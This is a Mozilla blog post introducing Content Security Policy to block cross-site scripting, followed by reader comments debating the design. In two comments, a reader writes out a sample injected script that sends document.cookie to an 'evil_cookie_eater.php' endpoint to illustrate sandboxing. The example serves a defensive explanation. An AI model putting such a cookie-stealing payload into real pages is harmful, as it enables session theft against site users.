Shutting Down XSS with Content Security Policy

Brandon Sterne


For several years, Cross-Site Scripting (XSS) attacks have plagued many of the web’s most popular sites and victimized their users. At Mozilla, we’ve been working for the last year on a new technology called Content Security Policy, designed to shut these attacks down. We wanted to give a bit of background on this project as well as provide an update on our progress so far.

XSS is possible because all the content received as part of a web server response is treated with equal privilege by the requesting browser. JavaScript and other content included in a web page are all combined into a single security context which has full access to the DOM. Content Security Policy (CSP) provides a mechanism for sites to explicitly tell the browser which content is legitimate. The browser can then disregard any content which has not been blessed by the site.

In order to differentiate legitimate content from injected or modified content, CSP requires that all JavaScript for a page be 1) loaded from an external file, and 2) served from an explicitly approved host. This means that all inline script, javascript: URIs, and event-handling HTML attributes will be ignored. Only script included via a <script> tag pointing to a white-listed host will be treated as valid. Additionally, CSP allows several other common-sense security restrictions to be enforced.
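
To make this concrete, here is a rough sketch of the change involved. The X-Content-Security-Policy header name is taken from the draft specification, but the directive syntax is simplified and may differ from the final spec, and the host and file names are invented for the example. A page that currently relies on an inline handler and an inline script block:

    <button onclick="checkout()">Buy</button>
    <script>
      function checkout() { document.location = "/cart"; }
    </script>

would instead declare its approved script host in a response header:

    X-Content-Security-Policy: script-src https://scripts.example.com

and load the same code from an external file on that host:

    <button id="buy">Buy</button>
    <script src="https://scripts.example.com/checkout.js"></script>

    // checkout.js, served from the whitelisted host, attaches the handler
    // that used to live in the onclick attribute
    document.getElementById("buy").addEventListener("click", function () {
      document.location = "/cart";
    }, false);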

We realize that this model is dramatically different from the current unrestricted model for the Web. We offer the following case supporting CSP’s adoption:

  1. CSP can be implemented in phases.

    While the biggest security benefit offered by Content Security Policy is the mitigation of XSS through inline script blocking, the migration of all JavaScript to external files may be challenging or time-consuming for some sites. Therefore, sites may choose to use the other features of Content Security Policy without adopting the JavaScript restrictions. Our hope is that this flexibility will provide a wide gate for such sites to adopt CSP in a limited fashion early, and later move toward a full implementation as time and resources permit. (A sketch of what such a partial policy might look like follows this list.)

  2. Even complex sites can be modified to support CSP.

    We have looked at HTML/JavaScript samples from a wide variety of websites ranging in complexity and have yet to see an example which could not be modified to support CSP. We’ll provide documentation regarding best practices for migrating a site to use CSP. Content Security Policy is also consistent with the programming paradigm “don’t mix code with content” so there may be additional functional benefits to be gained by implementing such separation.

  3. Drive a stake through the heart of XSS!

    XSS vulnerabilities have real value to attackers and are shared rapidly across the Web once discovered. Sites can breathe a little easier knowing that their users are protected, even if an XSS bug slips through. Because CSP can be configured to notify the protected site when an attack is blocked, CSP will even benefit users of older browsers by helping sites identify and plug vulnerabilities quickly. The bottom line is that it will be extremely difficult to mount a successful XSS attack against a site with CSP enabled. All common vectors for script injection will no longer work, and the bar for a successful attack is placed much, much higher.
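
As a sketch of what a first-phase deployment might look like (the directive names and reporting mechanism shown here are illustrative and may not match the final specification, and the hosts and report path are invented for the example), a site could restrict only where plugins and frames are loaded from and ask the browser to report blocked content, deferring the script restrictions to a later phase:

    X-Content-Security-Policy: plugin-src media.example.com; frame-src *.example.com; report-uri /csp-violation-report

A later phase would add a script-src directive listing the hosts that serve the site’s external JavaScript; at that point inline script is no longer honored and the full XSS protection described above takes effect.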

Content Security Policy has been a collaboration of many individuals and has received input from multiple web sites, browser vendors, and web app security researchers. We are very excited to have reached a level of stability in the design that has allowed us to begin implementation of the CSP specification. Stay tuned for further updates. We will let you know when the fixes have been checked in to trunk and the product is ready to be tested in our nightly builds. Let us know what you think!

Brandon Sterne
Security Program Manager

28 responses

  1. Alan wrote:

    What’s with the text/x-content-security-policy MIME type and X-Content-Security-Policy HTTP header in the spec? Surely if this is a proposed standard then both of these should be standardised and not marked as proprietary? Otherwise it seems a very good proposal to mitigate XSS attacks.

  2. voracity wrote:

    I appreciate your efforts to bolster security on the web, but this is an over-reaction. Has anyone conducted any decent risk analysis of XSS attacks? Involving hard estimates of probabilities and utilities (or at least economic costs)? Has anyone compared these costs to breaches of security via other means? (i.e. viruses, malware, browser holes, server exploits, psychological tricks) Would the costs be within even an order of magnitude? Would the costs be within even several orders of magnitude?

    Please answer these questions before you consider radically changing the culture of the web.

    As far as I can tell, all public website XSS problems can be solved very simply by fixing 3rd party cookie security rights (a la web fonts, XHR, etc.) and using sandboxes. The fact that cross-site cookies today aren’t treated with the same gravity as cross-site XHR et al. (by all browser makers) is an absolute scandal.

    This proposal is an inappropriate response to the problem: it is 10 years in jail for littering. Please — *please* — consider what you are doing very carefully before proceeding.

  3. Daniel Veditz wrote:

    In my own browsing I’ve turned off 3rd party cookies (really off, not Safari and IE’s half-off — “send ’em if you’ve got ’em” sounds suspiciously like the fatalistic “smoke ’em if you’ve got ’em”). It was no protection from any of the XSS attacks disclosed in nearly three years of the “So it begins…” thread.

  4. Brandon Sterne wrote:


    I’m not sure I understand your “over-reaction” argument. Content Security Policy is an opt-in mechanism. The severity of the XSS problem in the wild, and the cost of implementing CSP as a mitigation, are open to interpretation by individual sites. If the cost vs. benefit doesn’t make sense for a given site, it’s free to keep doing business as usual.

  5. voracity wrote:

    @Brandon: I appreciate CSP is an opt-in security technique (mandatory would be lunacy) but unless I’m much mistaken, you intend it to eventually be used by all major sites. Otherwise, why go to such efforts? If all major sites use it, it will have to be taught in colleges and universities as preferred web-programming practice. Hence why it will change the current culture.

    “The severity of the XSS problem in the wild … [is] open to interpretation by individual sites.”

    Ah, well, I don’t agree; the severity of the XSS problem is objective. It may not be easy to measure the severity (in terms of economic cost or, more accurately, social harm), but it is nonetheless objective. Are there any studies of the long-term economic costs of XSS attacks as compared to viruses or, say, bad web design?

  6. voracity wrote:

    @Daniel: “[Disabled 3rd party cookies] was no protection from any of the XSS attacks.”

    Really? I hope you’ll understand if I have my doubts.

    You’d at least agree that if someone is logged into their favourite pet store website, an evil 3rd party website can execute privileged actions on the pet store site unless the pet store site has taken appropriate security measures on the server. This wouldn’t be a problem if 3rd party cookie rights were handled properly (that is, as per cross-site XHR and fonts).

    I think we need to be clear about which XSS security issues we are dealing with:

    – HTML injection via GET or POST parameters: These can’t automatically be blocked because you can’t automatically tell the valid from invalid uses of HTML in submitted parameters. Yes, HTML in a GET parameter is unusual today, but it might not always be that way. JSON in a GET parameter was unusual once, too. And page injections here aren’t the real concern (sandboxes can do the protection) — the big worry is injection on the server (e.g. SQL injection, command line injection, out of bounds values, etc.)

    – User submissions and user pages (ebay, facebook, webmail, etc.): Random-boundary sandboxes. Enough said. Also, the style tag should only apply locally within its parent node! (It’s preposterous that style tags are hoisted to document level.) Imagine how simple life would be for the GMail developers if they could simply wrap each email in a conversation in its own sandbox?

    – Identity theft: As I described before, this can be solved by doing 3rd party cookie security properly. Intranets are different, but that’s just because privileges are identified differently (but don’t worry, the problem can still be solved). Identity can also be stolen when cookie authentication is used in conjunction with user submissions — but in those cases, what fixes the problem? Sandboxes.

    Again, the moral of the story is all XSS attacks can be vitiated by proper 3rd party cookie security and sandboxes (very important). In fact, CSP is just a very extreme and very inflexible form of sandbox!

  7. Chase Seibert wrote:

    I can’t tell if this is a domain, page or DOM node based system. Really, we should have all three. For websites that do have a lot of their own javascript, but output dynamic data into HTML templates, the page based whitelist is critical.

  8. Daniel Veditz wrote:

    @Chase: The policy is specified per page, although you could approximate per domain using the policyURI option and having all your pages load the same policy. The whitelisting in the policy is domain-based, or I should say origin-based since you also specify the scheme and port of the site from which you’re allowed to load.
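
    To sketch it (the exact directive spelling may change as the spec evolves, and the file name here is just an example), every page on the site would send a header pointing at a shared policy:

        X-Content-Security-Policy: policy-uri /csp-policy

    and /csp-policy, served with the text/x-content-security-policy MIME type, would contain the actual whitelist, for example:

        script-src scripts.example.com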

    Could you elaborate on what you meant by a “DOM node based system”?

  9. dan w wrote:

    Thanks for the post on CSP.

    While good web application design does favor separating JavaScript into separate files for both code manageability and efficiency (caching, compression), I wonder how much work most websites would require to completely rid most webapps of all inline code. Have you done any measurements on this for common applications? Regardless, I think there is value in this approach, because, as you point out, it lets a site that really cares about XSS put in some extra effort to gain better resistance.

    I do not have a deep understanding of the XSS threat model or all solutions that have been proposed, so I am hoping you can answer a question that I have. It seems that proposals like CSP try to enforce the principle that ‘only whitelisted code can be run on the client’. Since whitelisting code that is inlined in markup seems hard, such code is prohibited. It would seem more flexible if the site’s policy could simply state what code on that page cannot do. For example, prevent any JavaScript on the page from communicating data in any form (e.g., cookies) to anything but the originating site. In a sense, this would be saying “It’s ok if the attacker can inject code on a page, as long as that code cannot do anything truly dangerous” (like steal personal data from the page). Of course, this approach has problems in scenarios where a browser vulnerability allows JavaScript (or a malformed image) to break out of the sandbox, but that seems like a whole different attack.

    It seems that this approach makes a different trade-off than CSP, favoring flexibility for the web developer at the cost of some (but how much?) lost security. Then again, I may be missing something entirely, as I am no expert on XSS. Thanks.

  10. frenchfries wrote:

    From what I understand, this system would be based on a set of rules defined in HTTP headers or meta tags in the web page…
    What about using a single txt file at the root of the server (like the robots.txt file or the cross-domain method used by Flash)?
    It’s easier to implement, it takes less bandwidth (it won’t be sent with each response from the server), and it’s probably safer (it avoids the possibility of header injection with CRLF poisoning).

  11. voracity wrote:

    @dan w: Sandboxing is conceptually simple. For example, the generated page might contain:

    Innocent text
    new XMLHttpRequest().open(“evil_cookie_eater.php?”+document.cookie)
    More innocent text

    During parsing, the browser would identify the sandbox-boundary sections and strip out — during the parse, not DOM construction — anything dangerous that appears inside, leaving this (for example):

    Innocent text
    More innocent text

    I’m actually pretty confident browser makers will do this eventually (there are too many applications that are cumbersome without it). It’s just a question of whether it’s 1 year, 5 years or 10 years. :)

  12. voracity wrote:

    [Angle brackets got chewed. Is that irony?] Here it is again, with angle brackets replaced with square brackets.


    [div sandbox-boundary=”CDOIJO809DDMo33mdlkDxjk”]
    Innocent text
    [script]new XMLHttpRequest().open(“evil_cookie_eater.php?”+document.cookie)[/script]
    More innocent text
    [/div sandbox-boundary=”CDOIJO809DDMo33mdlkDxjk”]


    [div sandboxed]
    Innocent text
    More innocent text
    [/div]

  13. PaPPy wrote:

    I know some sites that have shut down due to an XSS worm. It took a lot of time to clean up, and the admin called it quits. XSS against sites that store credit cards, like Amazon, could also feed the ongoing identity-theft plague.

    Or you could fake a news article and see if you could get real news coverage 😀

  14. Andre wrote:

    Has this solution been submitted to the W3C, or has an RFC been submitted?

  15. Tim Powell wrote:

    How does this policy affect classic bookmarklets (using javascript: URIs) and Greasemonkey scripts? It is unacceptable to lose the ability to customize pages and their interaction. There’s a fundamental difference between JavaScript embedded in or linked to by pages and JavaScript run by bookmarklets and user scripts, but unfortunately they are often treated the same in the security model.

  16. Daniel Veditz wrote:

    Greasemonkey scripts are definitely unaffected. I’m not sure about bookmarklets; if we’ve broken them we’ll try to get them working again.

    The goal of CSP is to protect users by cooperating with site authors to enforce their security policies. This in no way means we’ve forgotten that the browser is the _user’s_ agent. It’s right there in the Mozilla Manifesto: “5. Individuals must have the ability to shape their own experiences on the Internet.”

  17. John Bell wrote:

    I’m very glad to hear that bookmarklets will be repaired if they are broken by CSP. That was my first concern when I heard that this policy was being developed some time ago. I have to say that I am still worried, though, that advanced bookmarklets will be restricted because they act in much the same way as some XSS attacks. For instance, a bookmarklet that bootstraps in a complex JavaScript app via script tags, which then continues to send data back via other script-tag includes. The sandbox that allows bookmarklets also needs to recognize that any actions initiated by that bookmarklet later on also need to be included in the sandbox.

  18. William wrote:

    Will this stuff be enforced against javascript run via NPN_Evaluate() from an NPAPI plugin?

  19. Daniel Veditz wrote:

    @John Bell: Some advanced bookmarklets may not work. If the bookmarklet does something that will load data from another site, that action will be subject to the CSP whitelist. Anything the bookmarklet adds to the page is part of the page and subject to the limitations on the page.

    It will be possible for users to disable Content Security Policy protection if for some reason they need to do so. The user can weigh the need to run their own script injection against the risk of unauthorized script injection.

    @William: We still have a few blurry edges around plugins. Some plugins can make their own network connections that are completely out of the browser’s control. If there’s enough interest in CSP, some of the plugin vendors may be interested in extending the NPAPI so they can participate in that model. Some people want to be able to control which types of plugin can load, not just from which sites. So far we’ve resisted that complication, but it’s useful feedback. We’re currently planning to vet NPN_GetURL() and the like against the plugin-src whitelist.

    Currently NPN_Evaluate is allowed because you allowed the plugin to load, but we can argue that the plugin’s origin should be vetted against the script-src whitelist before being allowed to call NPN_Evaluate(). It’s an open question.

  20. John Bell wrote:

    @Daniel Veditz: I’m disappointed to hear that. Is it at least possible for the user to have a global whitelist that overrides the one defined by the page/headers? A granular way to disable CSP that would allow it to still function in general, but trust all script includes that load from specific domains? I certainly see the value in CSP in general and wouldn’t want to recommend that people disable it completely, but a user whitelist (covered in enough warnings) seems like it would be a reasonable way to add CSP without limiting functionality.
